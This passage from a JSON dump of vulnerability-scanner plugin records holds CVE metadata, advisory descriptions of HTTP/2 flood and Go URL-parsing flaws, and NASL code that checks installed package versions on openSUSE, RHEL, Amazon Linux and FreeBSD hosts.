attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1086412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097473\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1104821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1118898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1144065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1161056\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1161179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/325820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://features.opensuse.org/326485\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kubernetes packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-1002105\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cri-o-kubeadm-criconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cri-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.14-race\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-apiserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-controller-manager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-kubeadm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-kubelet-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-kubelet1.17\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-kubelet1.18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kubernetes-scheduler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"cri-o-1.17.1-lp151.2.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"cri-o-kubeadm-criconfig-1.17.1-lp151.2.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"cri-tools-1.18.0-lp151.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.14-1.14-lp151.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.14-race-1.14-lp151.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-apiserver-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-client-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-controller-manager-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-kubeadm-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-kubelet-common-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-kubelet1.17-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-kubelet1.18-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-master-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-node-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-proxy-1.18.0-lp151.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"kubernetes-scheduler-1.18.0-lp151.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cri-o / cri-o-kubeadm-criconfig / cri-tools / go1.14 / go1.14-race / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T14:56:39", "description": "An update for cri-o is now available for Red Hat OpenShift Container Platform 3.11.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nSecurity Fix(es) :\n\n* containers/image: not enforcing TLS when sending username+password credentials to token servers leading to credential disclosure (CVE-2019-10214)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to these updated packages and images.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-24T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 3.11 (RHSA-2019:2817) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10214", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:cri-o", "p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2817.NASL", "href": "https://www.tenable.com/plugins/nessus/129265", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2817. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129265);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-10214\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2817\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11 (RHSA-2019:2817) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for cri-o is now available for Red Hat OpenShift Container\nPlatform 3.11.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* containers/image: not enforcing TLS when sending username+password\ncredentials to token servers leading to credential disclosure\n(CVE-2019-10214)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAll OpenShift Container Platform 3.11 users are advised to upgrade to\nthese updated packages and images.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:2817\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-10214\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected cri-o and / or cri-o-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10214\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2817\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-1.11.16-0.2.dev.rhaos3.11.git3f89eba.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cri-o-debuginfo-1.11.16-0.2.dev.rhaos3.11.git3f89eba.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cri-o / cri-o-debuginfo\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-09T15:06:44", "description": "net/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles malformed hosts in URLs, leading to an authorization bypass in some applications. This is related to a Host field with a suffix appearing in neither Hostname() nor Port(), and is related to a non-numeric port number. For example, an attacker can compose a crafted javascript:// URL that results in a hostname of google.com. (CVE-2019-14809)\n\nSome HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.(CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.(CVE-2019-9514)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-28T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : golang (ALAS-2019-1270) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:golang", "p-cpe:/a:amazon:linux:golang-bin", "p-cpe:/a:amazon:linux:golang-docs", "p-cpe:/a:amazon:linux:golang-misc", "p-cpe:/a:amazon:linux:golang-race", "p-cpe:/a:amazon:linux:golang-src", "p-cpe:/a:amazon:linux:golang-tests", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/128293", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1270.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128293);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"ALAS\", value:\"2019-1270\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Amazon Linux AMI : golang (ALAS-2019-1270) (Ping Flood) (Reset Flood)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"net/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles\nmalformed hosts in URLs, leading to an authorization bypass in some\napplications. This is related to a Host field with a suffix appearing\nin neither Hostname() nor Port(), and is related to a non-numeric port\nnumber. For example, an attacker can compose a crafted javascript://\nURL that results in a hostname of google.com. (CVE-2019-14809)\n\nSome HTTP/2 implementations are vulnerable to ping floods, potentially\nleading to a denial of service. The attacker sends continual pings to\nan HTTP/2 peer, causing the peer to build an internal queue of\nresponses. Depending on how efficiently this data is queued, this can\nconsume excess CPU, memory, or both.(CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood,\npotentially leading to a denial of service. The attacker opens a\nnumber of streams and sends an invalid request over each stream that\nshould solicit a stream of RST_STREAM frames from the peer. Depending\non how the peer queues the RST_STREAM frames, this can consume excess\nmemory, CPU, or both.(CVE-2019-9514)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1270.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update golang' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-race\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:golang-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"golang-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"golang-bin-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"golang-docs-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"golang-misc-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"golang-race-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"golang-src-1.12.8-1.51.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"golang-tests-1.12.8-1.51.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"golang / golang-bin / golang-docs / golang-misc / golang-race / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:23:36", "description": "Jonathon Loomey of Netflix reports :\n\nHTTP/2 implementations do not robustly handle abnormal traffic and resource exhaustion\n\nRecently, a series of DoS attack vulnerabilities have been reported on a broad range of HTTP/2 stacks. Among the vulnerabilities, H2O is exposed to the following :\n\n- CVE-2019-9512 'Ping Flood': The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses.\nDepending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service.\n\n- CVE-2019-9514 'Reset Flood': The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both, potentially leading to a denial of service.\n\n- CVE-2019-9515 'Settings Flood': The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-08-26T00:00:00", "type": "nessus", "title": "FreeBSD : h2o -- multiple HTTP/2 vulnerabilities (72a5579e-c765-11e9-8052-0028f8d09152) (Ping Flood) (Reset Flood) (Settings Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514", "CVE-2019-9515"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:h2o-devel", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_72A5579EC76511E980520028F8D09152.NASL", "href": "https://www.tenable.com/plugins/nessus/128135", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines 